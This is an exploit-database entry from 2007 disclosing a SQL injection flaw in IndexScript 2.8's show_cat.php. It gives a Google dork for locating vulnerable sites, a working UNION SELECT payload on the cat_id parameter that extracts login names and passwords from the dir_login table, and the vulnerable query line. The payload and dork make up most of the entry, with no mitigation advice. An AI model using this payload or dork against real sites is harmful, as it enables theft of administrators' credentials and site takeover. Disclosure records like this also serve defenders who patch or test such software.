id: 2049
date: 07/24/2007
title: IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability
author: xssvgamer
cves: 

====================================================================
IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability
====================================================================



Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"



#  0day.today [2023-03-23]  #